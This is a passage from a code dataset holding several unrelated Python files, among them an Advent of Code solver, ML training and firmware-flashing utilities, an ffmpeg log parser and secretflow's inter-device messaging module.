for key, value in patterns.items():\n for i in reversed(range(len(items))):\n k, v = items[i]\n m = re.sub(fr'(^|(?<=\\(|\\s)){key}((?=\\s|\\))|$)', value, v)\n\n if m:\n items[i] = (k, m)\n\n return patterns\n\n\ndef main():\n text = request.get('https://adventofcode.com/2020/day/19/input')\n inputs = text.strip().replace('\"', '').split('\\n\\n')\n rules = to_rules(inputs[0])\n messages = inputs[1].splitlines()\n print('* Part One:', part_one(rules, messages))\n print('** Part Two:', part_two(rules, messages))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"fredrik-sy/AoC2020","sub_path":"day19.py","file_name":"day19.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22874300636","text":"import os\nfrom common.request_utils import RequestUtils\nfrom common.testdata_utils import TestdataUtils\n\ncurrent=os.path.dirname(__file__)\ndata_path=os.path.join(current,'../data/test_case1.xlsx')\nprint(data_path)\n\nallcase=TestdataUtils('Sheet1').get_testcase_data_list()\nfor case_info in allcase:\n\n Result=RequestUtils().request_by_step(case_info.get('case_info'))\n print(Result)\n","repo_name":"Mmeiapple/Request_unittest","sub_path":"api_testcase/excel_data.py","file_name":"excel_data.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"74407454872","text":"\nimport random\n\ndef chunks(lst, n):\n 
\"\"\"Yield successive n-sized chunks from lst.\"\"\"\n for i in range(0, len(lst), n):\n yield lst[i:i + n]\n\n\nnums = [random.uniform(1, 10) for i in range(10)]\n\n\nnums_groups = list(chunks(nums, 4))\n\n\nprint(nums_groups)","repo_name":"benjaminhuanghuang/code-snippets","sub_path":"list-chunk/list-chunk.py","file_name":"list-chunk.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16305495388","text":"from trawler.browsers import BrowseBing, BrowseStackOverFlow, BrowseStackOverFlowDocumentation\nfrom trawler.browsers.exceptions import BrowerScrapeMethodNotImplemented\nimport pytest\nfrom trawler.settings import DEFAULT_MAX_RESULTS_PER_PAGE\n\n\ndef test_browse_with_bing():\n max_page = 1\n bing = BrowseBing(kw=\"Ravi RT Merugu\", max_page=max_page)\n bing.search()\n result = bing.data\n assert bing.data['result_count'] != 0\n assert bing.data[ 'result_count'] <= DEFAULT_MAX_RESULTS_PER_PAGE * max_page\n assert \"selenium-htmlunit\" == bing.shift_method()\n assert type(result) is dict\n assert \"result\" in result\n assert \"related_keywords\" in result\n bing.close()\n\n\ndef test_browse_with_bing_source_enin():\n max_page = 2\n bing = BrowseBing(kw=\"Ravi RT Merugu\", max_page=max_page, source=\"en-in\")\n bing.search()\n result = bing.data\n assert bing.data['result_count'] != 0\n assert bing.data['result_count'] <= DEFAULT_MAX_RESULTS_PER_PAGE * max_page\n assert \"selenium-htmlunit\" == bing.shift_method()\n assert type(result) is dict\n assert \"result\" in result\n assert \"related_keywords\" in result\n bing.close()\n\n\ndef test_browse_with_bing_source_enus():\n max_page = 1\n bing = BrowseBing(kw=\"Ravi RT Merugu\", max_page=max_page, source=\"en-us\")\n bing.search()\n result = bing.data\n assert bing.data['result_count'] != 0\n assert bing.data['result_count'] <= DEFAULT_MAX_RESULTS_PER_PAGE * max_page\n assert \"selenium-htmlunit\" == bing.shift_method()\n assert type(result) is dict\n assert \"result\" in result\n assert \"related_keywords\" in result\n bing.close()\n\n\n\ndef test_browser_with_stackoverflow():\n stack = BrowseStackOverFlow(kw=\"Python Exception errors\", max_page=1)\n stack.search()\n result = stack.data\n assert type(result) is dict\n assert \"result\" in result\n assert \"related_keywords\" in result\n stack.close()\n\n\ndef test_browser_no_nextpage():\n bing = BrowseBing(kw=\"XxXXXXXXxxxxxbas dans dsand msad asd amd ansd am dna smda sdn asdmas dm\", max_page=1)\n bing.search()\n result = bing.data\n assert result['next_url'] is None\n bing.close()\n\n\ndef test_browser_implamentation_error():\n with pytest.raises(BrowerScrapeMethodNotImplemented) as excinfo:\n bing = BrowseBing(kw=\"Hello\", max_page=1, method=\"chromejjj\")\n bing.search()\n bing.close()\n assert \"Not implemented\" in str(excinfo)\n","repo_name":"rrmerugu/trawler","sub_path":"tests/test_browser.py","file_name":"test_browser.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"40561085508","text":"import subprocess\n\nobj = 'BHR001'\nfname = 'out-2mass-' + obj\nlobj = '-c=%s' % obj\n\n# command to execute in bash\ncommand = ['vizquery',\n '-source=II/246',\n '-c.bm=45x45',\n '-out=RAJ2000 DEJ2000 Jmag Jcmsig Hmag Hcmsig Kmag Kcmsig',\n '-out.form=mini',\n lobj,\n 'Jcmsig=<0.03',\n 'Hcmsig=<0.03',\n 'Kcmsig=<0.03',\n 'Qflg=AAA']\n\n# save data\nwith open(fname, 'wb') as out:\n p = 
subprocess.Popen(command, stdout=out)\n p.wait()\n\n# erase the 49-line header and the trailing line\nlines = open(fname).readlines()\nopen(fname, 'w').writelines(lines[49:-1])\n\nprint(\"\\nData for \" + obj + \" is ready!\\n\")\n","repo_name":"gracca/2MASSdist","sub_path":"data2MASSdist.py","file_name":"data2MASSdist.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"42505256018","text":"\"\"\"empty message\n\nRevision ID: 93b501c2e5f6\nRevises: 8c4cf25f4e2b\nCreate Date: 2018-08-27 18:01:12.364963\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"93b501c2e5f6\"\ndown_revision = \"8c4cf25f4e2b\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"comment\",\n sa.Column(\"id\", sa.Integer(), nullable=False),\n sa.Column(\"body\", sa.Text(), nullable=True),\n sa.Column(\"timestamp\", sa.DateTime(), nullable=True),\n sa.Column(\"user_id\", sa.Integer(), nullable=True),\n sa.Column(\"post_id\", sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint([\"post_id\"], [\"post.id\"]),\n sa.ForeignKeyConstraint([\"user_id\"], [\"user.id\"]),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(\n op.f(\"ix_comment_timestamp\"), \"comment\", [\"timestamp\"], unique=False\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f(\"ix_comment_timestamp\"), table_name=\"comment\")\n op.drop_table(\"comment\")\n # ### end Alembic commands ###\n","repo_name":"arajmaharjan/WOU-CIS-Cousework","sub_path":"Wolfit/migrations/versions/93b501c2e5f6_add_comments.py","file_name":"93b501c2e5f6_add_comments.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"1662090246","text":"from typing import Dict, Type\nfrom os.path import basename\n\nfrom regex import search, compile\n\nfrom ...interfaces import ExtractLogInfosInterface\n\nclass ExtractLogInfos(ExtractLogInfosInterface):\n def __init__(self, log_path: str, error_class: Type[Exception]) -> None:\n self.__log_name = log_path\n self.__error_class = error_class\n self.__seconds = self.get_seconds()\n self.__bitrate = self.get_bitrate()\n \n def get_seconds(self) -> int:\n with open(self.__log_name, 'r') as f:\n file = f.readlines()\n for line in file:\n if 'Duration' in line:\n # Duration == Duration: 00:23:40.09...\n duration = line.strip().split(' ')[1][:-1:] # Extract the time and remove ','\n duration = duration.replace('.', ':')\n duration = duration.split(':')\n hour = int(duration[0]) * 3600\n minute = int(duration[1]) * 60\n second = int(duration[2])\n seconds = hour + minute + second\n return seconds\n return 1\n\n def get_bitrate(self) -> int:\n # ... Audio ... 44100 Hz ... 
128 kb/s...\n bitrate_regex = compile(r'([0-9]{3} kb\\/s)') # Regex to extract bitrate\n with open(self.__log_name, 'r') as f:\n file = f.readlines()\n for line in file:\n #if search(hertz_regex, line):\n if 'bitrate' in line:\n bitrate_str_pos = search(bitrate_regex, line)\n if bitrate_str_pos is None:\n raise self.__error_class('Log Error!')\n else:\n bitrate_str_pos = bitrate_str_pos.span()\n bitrate_str = \\\n line[bitrate_str_pos[0]:bitrate_str_pos[1]].replace(' kb/s', '')\n return int(bitrate_str)\n return 128\n\n def get_current_file_size(self) -> Dict[str, int]:\n total_file_size_regex = compile(r'(?<=(audio:))(.*)(?=(kBs))')\n current_file_size_regex = compile(r'(?<=(size=))(.*)(?=(kB))')\n cases = (\n ('size', 'in conversion', current_file_size_regex),\n ('audio', 'completed', total_file_size_regex)\n ) # ('key', 'message', regex)\n with open(self.__log_name, 'r') as f:\n file = f.readlines()\n file = [line for line in file if line != '\\n'] # Ignore empty lines\n last_line = file[-1].replace(' ', '')\n\n # Verify error\n\n if 'Exiting' in last_line:\n raise self.__error_class('Conversion Error!')\n\n for case, message, regex in cases:\n if case in last_line:\n pos = search(regex, last_line).span()\n size = int(last_line[pos[0]:pos[1]])\n return {message: size}\n raise self.__error_class('Log Error!')\n \n def get_estimated_file_size(self) -> int:\n return int((self.__seconds * self.__bitrate) / 8)\n\n def get_filename(self) -> str:\n filename_regex = compile(r\"(?<=to\\s\\')(.*)(?=\\')\")\n with open(self.__log_name, 'r') as f:\n file = f.readlines()\n for line in file:\n if 'Output' in line:\n pos = search(filename_regex, line).span()\n if pos is None:\n raise self.__error_class('Log Error!')\n filename = line[pos[0] : pos[1]]\n return basename(filename) # Remove path and return filename\n raise self.__error_class('Log Error!')","repo_name":"JoaoEmanuell/mp3-api","sub_path":"routes/api/source/conversor/ffmpeg/extract_log_infos.py","file_name":"extract_log_infos.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"12273812158","text":"import os\nimport time\nimport random\nfrom collections import Counter\n\nimport torch\nimport numpy as np\n\n\ndef cut_model_state_dict(state_dict):\n state_dict.pop(\"fc2.weight\")\n state_dict.pop(\"fc2.bias\")\n state_dict.pop(\"bn2.weight\")\n state_dict.pop(\"bn2.bias\")\n state_dict.pop(\"bn2.running_mean\")\n state_dict.pop(\"bn2.running_var\")\n state_dict.pop(\"bn2.num_batches_tracked\")\n state_dict.pop(\"center_features.weight\") if state_dict[\"center_features.weight\"] is not None else None\n\n\nclass Trainer:\n \"\"\"Class for training and evaluating a model.\"\"\"\n\n def __init__(self, model, args, logging=True, pretext=False):\n self.args = args\n self.model = model\n self.model.cuda()\n self.logging = logging\n self.pretext = pretext\n self.model_name = f\"{self.model.__class__.__name__}_{str(time.time()).split('.')[0]}\"\n self.best_accuracy = 0\n\n def train(self):\n \"\"\"Train the model.\"\"\"\n self.write_log(f\"Start training {self.model_name}\", mode=\"w\")\n \n self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.args.lr)\n self.scheduler = torch.optim.lr_scheduler.MultiStepLR(self.optimizer, milestones=[30, 80, 120], gamma=0.333) # changed\n\n train_data_loader = self.model.get_train_data_loader()\n val_data_loader = self.model.get_test_data_loader()\n\n self.write_log(\"\")\n for key, val in self.args.__dict__.items():\n 
self.write_log(f\"{key}: {val}\")\n self.write_log(\"\")\n\n for epoch in range(self.args.epochs):\n start_time = time.time()\n self.write_log(f\"Epoch {epoch + 1:03d}/{self.args.epochs:03d} | LR: {self.optimizer.param_groups[0]['lr']:.6f}\")\n self.train_epoch(train_data_loader)\n self.write_log(f\"Time elapsed: {(time.time() - start_time) / 60:.2f} mins.\")\n\n if self.pretext: # For a pretext model, save without running evaluation\n torch.save(self.model.state_dict(), f\"results/train/weights/{self.model_name}.pt\")\n self.write_log(\"Saved model!\")\n elif (epoch + 1) % 10 == 0: # Run evaluation every N epochs\n self.eval(val_data_loader)\n \n def train_epoch(self, data_loader):\n \"\"\"Train the model for one epoch.\"\"\"\n\n self.model.train()\n\n # Lists for tracking training progress\n cost_list = list()\n ind_cost_list = list()\n\n for batch_idx, data in enumerate(data_loader):\n cost, ind_costs = self.model.get_cost(data)\n\n self.optimizer.zero_grad()\n cost.backward()\n self.optimizer.step()\n\n cost_list.append(cost.item())\n ind_cost_list.append(ind_costs)\n \n if (batch_idx + 1) % 10 == 0 or (batch_idx + 1) == len(data_loader):\n self.write_log(f\"Batch: {batch_idx + 1:04d}/{len(data_loader):04d} | Cost: {np.mean(cost_list):.4f} {np.round(np.mean(ind_cost_list, axis=0), 3)}\")\n\n # Reset the tracking lists\n cost_list = list()\n ind_cost_list = list()\n\n self.scheduler.step()\n \n def eval(self, data_loader, train=True, save=False):\n \"\"\"Evaluate the model or run inference.\"\"\"\n self.model.eval()\n\n img1_path_list = list()\n img2_path_list = list()\n labels_list = list()\n label_preds_list = list()\n\n for idx, data in enumerate(data_loader):\n print(f\"Evaluation Batch: {idx + 1:04d}/{len(data_loader):04d}\", end=\"\\r\")\n\n img1_path, img2_path, labels, label_preds = self.model.evaluate(data)\n img1_path_list.extend(img1_path)\n img2_path_list.extend(img2_path)\n labels_list.extend(labels)\n label_preds_list.extend(label_preds)\n print()\n \n threshold = np.median(label_preds_list)\n self.write_log(f\"Threshold: {threshold:.4f}\")\n\n label_preds_list = np.array(label_preds_list) > threshold\n accuracy = np.mean(np.array(labels_list).astype(bool) == np.array(label_preds_list).astype(bool))\n self.write_log(f\"Accuracy: {accuracy:.6f}\")\n\n # During training, keep the model with the best validation accuracy\n if train:\n if accuracy > self.best_accuracy:\n self.best_accuracy = accuracy\n\n # Strip layers not used for inference before saving the model\n state_dict = self.model.state_dict()\n cut_model_state_dict(state_dict)\n torch.save(state_dict, f\"results/train/weights/{self.model_name}.pt\")\n self.write_log(\"Saved best model!\")\n \n # Save prediction results if requested\n if save:\n with open(f\"results/test/{self.args.model_weight.split('/')[-1].split('.')[0]}_preds.csv\", \"w\") as result:\n result.write(f\"image1,image2,label\\n\")\n for img1_path, img2_path, pred in zip(img1_path_list, img2_path_list, label_preds_list):\n result.write(f\"{img1_path},{img2_path},{int(pred)}\\n\")\n\n def write_log(self, msg, mode=\"a\"):\n \"\"\"Write to the log file.\"\"\"\n if self.logging:\n with open(f\"results/train/logs/{self.model_name}.log\", mode) as log:\n log.write(f\"{msg}\\n\")\n print(msg)\n","repo_name":"jessekim-ck/2020-ai-challenge-04","sub_path":"src/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":5376,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"5"} +{"seq_id":"42555411066","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport os\nfrom pyocd.core.helpers import ConnectHelper\nfrom pyocd.target.builtin import 
BUILTIN_TARGETS\n# from pyocd.target.pack import pack_target ManagedPacks\nfrom pyocd.target.pack.pack_target import ManagedPacks\nfrom PyQt5.QtWidgets import QApplication, QComboBox, QWidget, QVBoxLayout, QTableWidgetItem, QFileDialog, QMessageBox\nfrom daplink_flash_ui import *\nimport pyocd.core\nfrom pyocd.core.memory_map import MemoryType\n# import cmsis_pack_manager\nfrom pyocd.target.pack.cmsis_pack import (CmsisPack, MalformedCmsisPackError)\nfrom pyocd.flash.file_programmer import FileProgrammer\nimport logging\nfrom pyocd.target import TARGET\n\nclass Flash_Loader(object):\n\n def __init__(self):\n app = QApplication(sys.argv)\n self.window = QWidget()\n\n self.ui = Ui_Form()\n self.ui.setupUi(self.window)\n self.session = None\n\n\n probes = ConnectHelper.get_all_connected_probes(blocking=False)\n for probe in probes:\n self.ui.daplink_list.addItem(probe.description)\n if len(probes) > 0:\n self.probe = probes[0]\n # print(self.probe)\n else:\n self.probe = None\n \n\n # logger = logging.getLogger(__name__)\n # logger.setLevel(level=logging.DEBUG)\n\n # StreamHandler\n # stream_handler = logging.StreamHandler(self.ui.log.append)\n # stream_handler.setLevel(level=logging.DEBUG)\n # logger.addHandler(stream_handler)\n\n self.ui.flash.clicked.connect(self.flash_device_run)\n self.ui.update_dap.clicked.connect(self.update_daplink)\n self.ui.connect.clicked.connect(self.open_session)\n self.ui.selsec_firmware.clicked.connect(self.select_file)\n self.ui.daplink_list.currentIndexChanged.connect(self.daplink_change)\n\n self.ui.flash.setDisabled(True)\n self.ui.progressBar.setValue(0)\n self.window.show()\n app.exec_()\n\n\n def daplink_change(self):\n probes = ConnectHelper.get_all_connected_probes(blocking=False)\n\n # Select the probe that matches the combo box entry; stop at the first\n # match so a later non-matching probe cannot reset the selection to None.\n self.probe = None\n for probe in probes:\n if probe.description == self.ui.daplink_list.currentText():\n self.probe = probe\n break\n\n def open_session(self):\n if self.session is not None and self.session.is_open:\n self.session.close()\n\n if self.probe is None:\n QMessageBox.information(self.window, \"ERROR\", \"No probe\", QMessageBox.Ok)\n return\n\n target_device = \"stm32f103c8\"\n\n if target_device not in TARGET:\n QMessageBox.information(self.window, \"ERROR\", \"MCU not supported\", QMessageBox.Ok)\n return\n\n self.session = ConnectHelper.session_with_chosen_probe(\n target_override=target_device,unique_id=self.probe.unique_id)\n self.session.open()\n\n # print(self.probe.unique_id)\n board = self.session.board\n self.target = board.target\n\n memory_map = board.target.get_memory_map()\n ram_region = memory_map.get_default_region_of_type(MemoryType.RAM)\n rom_region = memory_map.get_boot_memory()\n\n self.addr_bin = rom_region.start\n self.ui.flash.setEnabled(True)\n\n def flash_device(self):\n print(\"flash device\")\n if os.path.exists(self.ui.filepath.text()):\n self.ui.log.append(\"Start flashing\")\n FileProgrammer(self.session, progress=self.progress_monitor).program(self.ui.filepath.text(), base_address=self.addr_bin)\n self.ui.log.append(\"Finish flashing\")\n else:\n QMessageBox.critical(self.window,\"ERROR\",\"Firmware does not exist\",QMessageBox.Yes)\n\n\n def flash_device_run(self):\n\n if os.path.exists(self.ui.filepath.text()):\n self.ui.log.append(\"Start flashing\")\n FileProgrammer(self.session, progress=self.progress_monitor).program(\n self.ui.filepath.text(), base_address=self.addr_bin)\n self.ui.log.append(\"Finish flashing\")\n self.target.reset()\n else:\n QMessageBox.critical(self.window,\"ERROR\",\"Firmware does not 
exist\",QMessageBox.Yes)\n \n\n\n def progress_monitor(self, amount):\n print(\"progress\")\n print(amount)\n self.ui.progressBar.setValue(amount * 100)\n\n\n\n def update_daplink(self):\n self.ui.daplink_list.clear()\n probes = ConnectHelper.get_all_connected_probes(blocking=False)\n\n for probe in probes:\n self.ui.daplink_list.addItem(probe.description)\n if len(probes) > 0:\n self.probe = probes[0]\n else:\n self.probe = None\n \n def select_file(self):\n filepath, filetype = QFileDialog.getOpenFileName(\n self.window, \"open firmware\", \"./\", \"hex(*.hex);;bin(*.bin);;\")\n # print(filepath)\n self.ui.filepath.setText(filepath)\n\n\nif __name__ == '__main__':\n Flash_Loader()\n\n","repo_name":"zhuangzuoyi/daplink_flasher","sub_path":"pyocd_target/flash_loader.py","file_name":"flash_loader.py","file_ext":"py","file_size_in_byte":4950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"886383203","text":"import logging\nimport threading\nfrom abc import ABC, abstractmethod\nfrom threading import Condition\nfrom typing import Any, Dict, List, Union\n\nimport fed\nimport ray\n\nimport secretflow.distributed as sfd\nfrom secretflow.device.driver import reveal\nfrom secretflow.distributed.primitive import DISTRIBUTION_MODE\n\nfrom .device import PYU\n\nthread_local = threading.local()\n\nSERVER = \"server\"\nCLIENT = \"client\"\n\n\ndef get_role():\n return thread_local.link.role\n\n\ndef get_device():\n return thread_local.link.device\n\n\ndef set_mesh(link: 'Link'):\n thread_local.link = link\n\n\ndef send_to_clients(name, value, version):\n \"\"\"Send message to the target device.\n This function is non-blocking.\n\n Args:\n name: message name\n value: message value\n version: message version, used to distinguish between different training rounds\n \"\"\"\n thread_local.link.send(name, value, thread_local.link._clients, version)\n\n\ndef send_to_server(name, value, version):\n \"\"\"Send message to the target device.\n This function is non-blocking.\n\n Args:\n name: message name\n value: message value\n version: message version, used to distinguish between different training rounds\n \"\"\"\n thread_local.link.send(name, value, thread_local.link._server, version)\n\n\ndef recv_from_clients(name, version):\n \"\"\"\n Receive messages from the source device.\n This function is blocking.\n\n Args:\n name: message name\n version: message version, used to distinguish between different training rounds\n\n Returns:\n The received message\n \"\"\"\n return thread_local.link.recv(name, thread_local.link._clients, version)\n\n\ndef recv_from_server(name, version):\n \"\"\"\n Receive messages from the source device.\n This function is blocking.\n\n Args:\n name: message name\n version: message version, used to distinguish between different training rounds\n\n Returns:\n The received message\n \"\"\"\n return thread_local.link.recv(name, thread_local.link._server, version)\n\n\nclass Communicator(ABC):\n @abstractmethod\n def send(dest: PYU, data: Any, key: str):\n raise NotImplementedError()\n\n @abstractmethod\n def recv(src: PYU, keys: Union[str, List[str]]):\n raise NotImplementedError()\n\n\nclass FedCommunicator(Communicator):\n def __init__(self, partners: List[PYU]):\n self.parties = [partner.party for partner in partners]\n\n def send(self, dest: PYU, data: Any, key: str):\n assert dest.party in self.parties, f'Device {dest} is not in this communicator.'\n return fed.send(\n dest_party=dest.party,\n data=data,\n upstream_seq_id=key,\n 
downstream_seq_id=key,\n )\n\n def recv(self, src: PYU, keys: Union[str, List[str]]):\n is_single = isinstance(keys, str)\n if is_single:\n keys = [keys]\n\n vals = ray.get([fed.recv(src.party, src.party, key, key) for key in keys])\n return vals[0] if is_single else vals\n\n\nclass RayCommunicator(Communicator):\n def __init__(self):\n self._messages = {}\n self._cv = Condition()\n\n def links(self, links: Dict[PYU, ray.actor.ActorHandle]):\n self._links = links\n\n def send(self, dest: PYU, data: Any, key: str):\n assert dest in self._links, f'Device {dest} is not in this communicator.'\n logging.debug(f'send to dest {dest}')\n self._links[dest]._recv_message.remote(key, data)\n\n def _recv_message(self, key: str, value: Any):\n \"\"\"Receive message\n\n Args:\n key: The message key, consisting of source & destination device,\n message name, and unique identifier\n value: message body\n \"\"\"\n logging.debug(f'receive message from remote: {key}')\n with self._cv:\n self._messages[key] = value\n self._cv.notify_all()\n\n def recv(self, src: PYU, keys: Union[str, List[str]]):\n logging.debug(f'receive message: {keys}')\n\n is_single = isinstance(keys, str)\n if is_single:\n keys = [keys]\n vals = {}\n with self._cv:\n while True:\n recv_keys = []\n for k in keys:\n if k in self._messages:\n vals[k] = self._messages.pop(k)\n recv_keys.append(k)\n\n for k in recv_keys:\n keys.remove(k)\n\n if len(keys) == 0:\n break\n self._cv.wait()\n\n return list(vals.values())[0] if is_single else list(vals.values())\n\n\nclass Link:\n \"\"\"A helper class for communication between several actors.\n\n You should not use this class directly but inherit it and decorate your\n child class with :py:meth:`~secretflow.device.proxy`.\n\n Examples\n --------\n >>> from secretflow.device import proxy\n >>> from secretflow.device.link import Link, init_link\n >>>\n >>> @proxy\n >>> class PS(Link):\n >>> def run(self):\n >>> pass\n >>>\n >>>\n >>> @proxy\n >>> class Client(Link):\n >>> def run(self):\n >>> pass\n >>>\n >>> ps = PS()\n >>> clients = [Client() for i in range(2)]\n >>> init_link(ps, clients)\n >>> for client in clients:\n >>> init_link(client, ps)\n >>>\n \"\"\"\n\n def __init__(self, device: PYU, key_prefix: str = ''):\n \"\"\"Initialize\n\n Args:\n device: the PYU where this Link instance is located\n \"\"\"\n self._device = device\n self._initialized = False\n self._clients = None\n self._server = None\n self._key_prefix = key_prefix\n self._comm = None\n\n def initialize(\n self, comm_or_links: Union[Communicator, Dict[PYU, ray.actor.ActorHandle]]\n ):\n if isinstance(comm_or_links, FedCommunicator):\n self._comm = comm_or_links\n else:\n self._comm = RayCommunicator()\n self._comm.links(comm_or_links)\n # Indicate success.\n return True\n\n @staticmethod\n def _create_key(\n src_device: Union[PYU, List[PYU]],\n dst_device: Union[PYU, List[PYU]],\n name: str,\n step_id: int = 0,\n key_prefix='',\n ):\n if isinstance(src_device, PYU) and isinstance(dst_device, PYU):\n return f'{key_prefix};{src_device};{dst_device};{name};{step_id}'\n elif isinstance(src_device, List):\n assert isinstance(dst_device, PYU), f'invalid dst_device: {dst_device}'\n return [\n f'{key_prefix};{device};{dst_device};{name};{step_id}'\n for device in src_device\n ]\n elif isinstance(dst_device, List):\n assert isinstance(src_device, PYU), f'invalid src_device: {src_device}'\n return [\n f'{key_prefix};{src_device};{device};{name};{step_id}'\n for device in dst_device\n ]\n else:\n assert False, f'invalid src_device: 
{src_device}, dst_device: {dst_device}'\n\n @property\n def clients(self):\n return self._clients\n\n @clients.setter\n def clients(self, clients: List[PYU]):\n self._clients = clients\n\n @property\n def server(self):\n return self._server\n\n @server.setter\n def server(self, server: PYU):\n self._server = server\n\n def send(\n self, name: str, value: Any, dst_device: Union[PYU, List[PYU]], step_id: int = 0\n ):\n \"\"\"Send message to target device.\n This function is non-blocking.\n\n Args:\n name: message name\n value: message value\n dst_device: target device(s), can be a single device or a list of devices\n step_id: A process-level unique identifier to identify the communication\n \"\"\"\n assert isinstance(dst_device, PYU) or (\n isinstance(dst_device, List) and len(dst_device) > 0\n ), f'dst_device must be PYU or PYU list'\n\n key = self._create_key(\n self._device, dst_device, name, step_id, self._key_prefix\n )\n logging.debug(f'send message: {key}')\n\n if isinstance(dst_device, list):\n for msg_id, device in zip(key, dst_device):\n self._comm.send(device, value, msg_id)\n else:\n self._comm.send(dst_device, value, key)\n\n def _recv_message(self, key: str, value: Any):\n \"\"\"Receive message\n\n Args:\n key: The message key, consisting of source & destination device,\n message name, and unique identifier\n value: message body\n \"\"\"\n logging.debug(f'receive message from remote: {key}')\n self._comm._recv_message(key, value)\n\n def recv(\n self, name: str, src_device: Union[PYU, List[PYU]], step_id: int = 0\n ) -> Any:\n \"\"\"Receive messages from the source device.\n This function is blocking.\n\n Args:\n name: The message name\n src_device: source device(s), can be a single device or a list of devices\n step_id: A process-level unique identifier to identify the communication\n\n Returns:\n The received message\n \"\"\"\n assert isinstance(src_device, PYU) or (\n isinstance(src_device, List) and len(src_device) > 0\n ), f'src_device must be PYU or PYU list'\n\n key = self._create_key(\n src_device, self._device, name, step_id, self._key_prefix\n )\n logging.debug(f'receive message: {key}')\n return self._comm.recv(src=self._device, keys=key)\n\n\ndef init_link(link: Link, partners: List[Link]):\n if not isinstance(partners, list):\n partners = [partners]\n if sfd.get_distribution_mode() == DISTRIBUTION_MODE.PRODUCTION:\n comm = FedCommunicator([partner.device for partner in partners])\n # Use `get` here as a barrier to make sure that initialize is done first.\n # Note that link should be a `proxy`ed actor.\n reveal(link.initialize(comm))\n else:\n reveal(link.initialize({partner.device: partner.data for partner in partners}))\n","repo_name":"secretflow/secretflow","sub_path":"secretflow/device/link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":10133,"program_lang":"python","lang":"en","doc_type":"code","stars":2029,"dataset":"github-code","pt":"5"} +{"seq_id":"6201034943","text":"import cv2\nimport numpy as np\nimport dlib\nfrom math import hypot\n\n# Load camera and eye images, and create masks\ncap = cv2.VideoCapture(0)\nleft_eye = cv2.imread(\"ojo_izq.png\")\nright_eye = cv2.imread(\"ojo_der.png\")\n_, frame = cap.read()\nrows, cols, _ = frame.shape\nl_eye_mask = np.zeros((rows, cols), np.uint8)\nr_eye_mask = np.zeros((rows, cols), np.uint8)\n# Loading Face detector\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")\nwhile True:\n _, frame = cap.read()\n l_eye_mask.fill(0)\n 
r_eye_mask.fill(0)\n gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = detector(frame)\n for face in faces:\n landmarks = predictor(gray_frame, face)\n # Left eye landmark coordinates\n top_left_eye = (landmarks.part(43).x, landmarks.part(43).y)\n bot_left_eye = (landmarks.part(47).x, landmarks.part(47).y)\n left_left_eye = (landmarks.part(42).x, landmarks.part(42).y)\n right_left_eye = (landmarks.part(45).x, landmarks.part(45).y)\n\n left_eye_width = round(abs(left_left_eye[0] - right_left_eye[0] * 1.05))\n left_eye_height = round(abs(top_left_eye[1] - bot_left_eye[1] * 1.05))\n\n top_right_eye = (landmarks.part(38).x, landmarks.part(38).y)\n bot_right_eye = (landmarks.part(40).x, landmarks.part(40).y)\n left_right_eye = (landmarks.part(36).x, landmarks.part(36).y)\n right_right_eye = (landmarks.part(39).x, landmarks.part(39).y)\n\n right_eye_width = round(abs(left_right_eye[0] - right_right_eye[0] * 1.05))\n right_eye_height = round(abs(top_right_eye[1] - bot_right_eye[1] * 1.05))\n # New left eye position\n left_e_top_left = (left_left_eye[0]), int((right_left_eye[1] - left_eye_height / 2))\n left_e_bottom_right = (right_left_eye[0]), int((right_left_eye[1] + left_eye_height / 2))\n # New right eye position\n right_e_top_left = (left_right_eye[0]), int((right_right_eye[1] - right_eye_height / 2))\n right_e_bottom_right = (right_right_eye[0]), int((right_right_eye[1] + right_eye_height / 2))\n\n # Adding the new left eye\n\n l_eye = cv2.resize(left_eye, (left_eye_width, left_eye_height))\n r_eye = cv2.resize(right_eye, (right_eye_width, right_eye_height))\n l_eye_gray = cv2.cvtColor(l_eye, cv2.COLOR_BGR2GRAY)\n r_eye_gray = cv2.cvtColor(r_eye, cv2.COLOR_BGR2GRAY)\n _, l_eye_mask = cv2.threshold(l_eye_gray, 200, 255, cv2.THRESH_BINARY)\n _, l_eye_mask_inv = cv2.threshold(l_eye_gray, 200, 255, cv2.THRESH_BINARY_INV)\n\n _, r_eye_mask = cv2.threshold(r_eye_gray, 200, 255, cv2.THRESH_BINARY)\n _, r_eye_mask_inv = cv2.threshold(r_eye_gray, 200, 255, cv2.THRESH_BINARY_INV)\n\n l_eye_area = frame[left_e_top_left[1]: left_e_top_left[1] + left_eye_height,\n 